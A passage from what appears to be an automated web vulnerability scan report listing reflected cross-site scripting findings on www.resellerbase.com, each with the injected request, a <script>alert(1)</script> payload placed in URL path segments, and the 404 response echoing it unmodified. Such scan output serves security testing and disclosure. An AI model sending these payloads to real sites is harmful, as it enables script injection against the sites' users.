<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themes59a7b<script>alert(1)</script>9390b182871/kosmos/ajax.js was not found on this server.</p>
...[SNIP]...

2.4764. http://www.resellerbase.com/themes/kosmos/ajax.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/themes/kosmos/ajax.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ec5fe<script>alert(1)</script>f94c3d1f46f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/kosmosec5fe<script>alert(1)</script>f94c3d1f46f/ajax.js HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/add.php?cat=10
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 22:55:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themes/kosmosec5fe<script>alert(1)</script>f94c3d1f46f/ajax.js was not found on this server.</p>
...[SNIP]...

2.4765. http://www.resellerbase.com/themes/kosmos/ajax.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/themes/kosmos/ajax.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6d9e0<script>alert(1)</script>ba6102ca981 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/kosmos/ajax.js6d9e0<script>alert(1)</script>ba6102ca981 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/add.php?cat=10
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 22:55:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themes/kosmos/ajax.js6d9e0<script>alert(1)</script>ba6102ca981 was not found on this server.</p>
...[SNIP]...

2.4766. http://www.resellerbase.com/themes/kosmos/calendar-en.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/themes/kosmos/calendar-en.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2b1f2<script>alert(1)</script>dc752dbe034 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes2b1f2<script>alert(1)</script>dc752dbe034/kosmos/calendar-en.js HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/add.php?cat=10
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 22:55:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themes2b1f2<script>alert(1)</script>dc752dbe034/kosmos/calendar-en.js was not found on this server.</p>
...[SNIP]...

2.4767. http://www.resellerbase.com/themes/kosmos/calendar-en.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/themes/kosmos/calendar-en.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d63cd<script>alert(1)</script>bc74a0437d8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/kosmosd63cd<script>alert(1)</script>bc74a0437d8/calendar-en.js HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/add.php?cat=10
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 22:55:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themes/kosmosd63cd<script>alert(1)</script>bc74a0437d8/calendar-en.js was not found on this server.</p>
...[SNIP]...

2.4768. http://www.resellerbase.com/themes/kosmos/calendar-en.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/themes/kosmos/calendar-en.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d5adf<script>alert(1)</script>02ba47e9784 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/kosmos/calendar-en.jsd5adf<script>alert(1)</script>02ba47e9784 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/add.php?cat=10
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 22:55:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themes/kosmos/calendar-en.jsd5adf<script>alert(1)</script>02ba47e9784 was not found on this server.</p>
...[SNIP]...

2.4769. http://www.resellerbase.com/themes/kosmos/calendar-setup.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/themes/kosmos/calendar-setup.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6b9e8<script>alert(1)</script>7d7b24874d7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes6b9e8<script>alert(1)</script>7d7b24874d7/kosmos/calendar-setup.js HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/add.php?cat=10
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 22:55:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themes6b9e8<script>alert(1)</script>7d7b24874d7/kosmos/calendar-setup.js was not found on this server.</p>
...[SNIP]...

2.4770. http://www.resellerbase.com/themes/kosmos/calendar-setup.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/themes/kosmos/calendar-setup.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a0f09<script>alert(1)</script>cbe41c8a9df was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/kosmosa0f09<script>alert(1)</script>cbe41c8a9df/calendar-setup.js HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/add.php?cat=10
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 22:55:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themes/kosmosa0f09<script>alert(1)</script>cbe41c8a9df/calendar-setup.js was not found on this server.</p>
...[SNIP]...

2.4771. http://www.resellerbase.com/themes/kosmos/calendar-setup.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/themes/kosmos/calendar-setup.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ab679<script>alert(1)</script>5d9d54cfb5f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/kosmos/calendar-setup.jsab679<script>alert(1)</script>5d9d54cfb5f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/add.php?cat=10
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 22:56:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themes/kosmos/calendar-setup.jsab679<script>alert(1)</script>5d9d54cfb5f was not found on this server.</p>
...[SNIP]...

2.4772. http://www.resellerbase.com/themes/kosmos/calendar-system.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/themes/kosmos/calendar-system.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload db4c8<script>alert(1)</script>f804c676c56 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themesdb4c8<script>alert(1)</script>f804c676c56/kosmos/calendar-system.css HTTP/1.1
Accept: */*
Referer: http://www.resellerbase.com/
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.resellerbase.com
Proxy-Connection: Keep-Alive
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:23:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: User-Agent
Connection: close
Content-Type: text/html
Content-Length: 8260

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themesdb4c8<script>alert(1)</script>f804c676c56/kosmos/calendar-system.css was not found on this server.</p>
...[SNIP]...

2.4773. http://www.resellerbase.com/themes/kosmos/calendar-system.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/themes/kosmos/calendar-system.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 70e88<script>alert(1)</script>3d1e083187d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/kosmos70e88<script>alert(1)</script>3d1e083187d/calendar-system.css HTTP/1.1
Accept: */*
Referer: http://www.resellerbase.com/
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.resellerbase.com
Proxy-Connection: Keep-Alive
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:24:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: User-Agent
Connection: close
Content-Type: text/html
Content-Length: 8260

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themes/kosmos70e88<script>alert(1)</script>3d1e083187d/calendar-system.css was not found on this server.</p>
...[SNIP]...

2.4774. http://www.resellerbase.com/themes/kosmos/calendar-system.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/themes/kosmos/calendar-system.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 912b8<script>alert(1)</script>190baac01fb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/kosmos/calendar-system.css912b8<script>alert(1)</script>190baac01fb HTTP/1.1
Accept: */*
Referer: http://www.resellerbase.com/
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.resellerbase.com
Proxy-Connection: Keep-Alive
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:24:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: User-Agent
Connection: close
Content-Type: text/html
Content-Length: 8260

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themes/kosmos/calendar-system.css912b8<script>alert(1)</script>190baac01fb was not found on this server.</p>
...[SNIP]...

2.4775. http://www.resellerbase.com/themes/kosmos/calendar.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/themes/kosmos/calendar.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 60f84<script>alert(1)</script>06429e8a448 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes60f84<script>alert(1)</script>06429e8a448/kosmos/calendar.js HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/add.php?cat=10
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 22:56:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themes60f84<script>alert(1)</script>06429e8a448/kosmos/calendar.js was not found on this server.</p>
...[SNIP]...

2.4776. http://www.resellerbase.com/themes/kosmos/calendar.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/themes/kosmos/calendar.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5f9e7<script>alert(1)</script>bb35cbed7d7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/kosmos5f9e7<script>alert(1)</script>bb35cbed7d7/calendar.js HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/add.php?cat=10
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 22:56:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themes/kosmos5f9e7<script>alert(1)</script>bb35cbed7d7/calendar.js was not found on this server.</p>
...[SNIP]...

2.4777. http://www.resellerbase.com/themes/kosmos/calendar.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/themes/kosmos/calendar.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f2d30<script>alert(1)</script>7330767dc1a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/kosmos/calendar.jsf2d30<script>alert(1)</script>7330767dc1a HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/add.php?cat=10
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 22:56:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themes/kosmos/calendar.jsf2d30<script>alert(1)</script>7330767dc1a was not found on this server.</p>
...[SNIP]...

2.4778. http://www.resellerbase.com/themes/kosmos/images/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ef41f<script>alert(1)</script>f6716ea52ad was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themesef41f<script>alert(1)</script>f6716ea52ad/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 22:55:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themesef41f<script>alert(1)</script>f6716ea52ad/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.4779. http://www.resellerbase.com/themes/kosmos/images/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bb671<script>alert(1)</script>bbe3c98b5b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/kosmosbb671<script>alert(1)</script>bbe3c98b5b/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 22:55:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themes/kosmosbb671<script>alert(1)</script>bbe3c98b5b/images/ was not found on this server.</p>
...[SNIP]...

2.4780. http://www.resellerbase.com/themes/kosmos/images/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 14058<script>alert(1)</script>9242bcbd690 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/kosmos/images14058<script>alert(1)</script>9242bcbd690/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 22:55:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themes/kosmos/images14058<script>alert(1)</script>9242bcbd690/ was not found on this server.</p>
...[SNIP]...

2.4781. http://www.resellerbase.com/themes/kosmos/images/pr/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/themes/kosmos/images/pr/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d2e6f<script>alert(1)</script>c48c9bd26ee was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themesd2e6f<script>alert(1)</script>c48c9bd26ee/kosmos/images/pr/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 22:55:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themesd2e6f<script>alert(1)</script>c48c9bd26ee/kosmos/images/pr/ was not found on this server.</p>
...[SNIP]...

2.4782. http://www.resellerbase.com/themes/kosmos/images/pr/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/themes/kosmos/images/pr/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a8311<script>alert(1)</script>7f26011e625 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/kosmosa8311<script>alert(1)</script>7f26011e625/images/pr/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 22:55:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themes/kosmosa8311<script>alert(1)</script>7f26011e625/images/pr/ was not found on this server.</p>
...[SNIP]...

2.4783. http://www.resellerbase.com/themes/kosmos/images/pr/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/themes/kosmos/images/pr/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 62251<script>alert(1)</script>1ce671cd2fd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

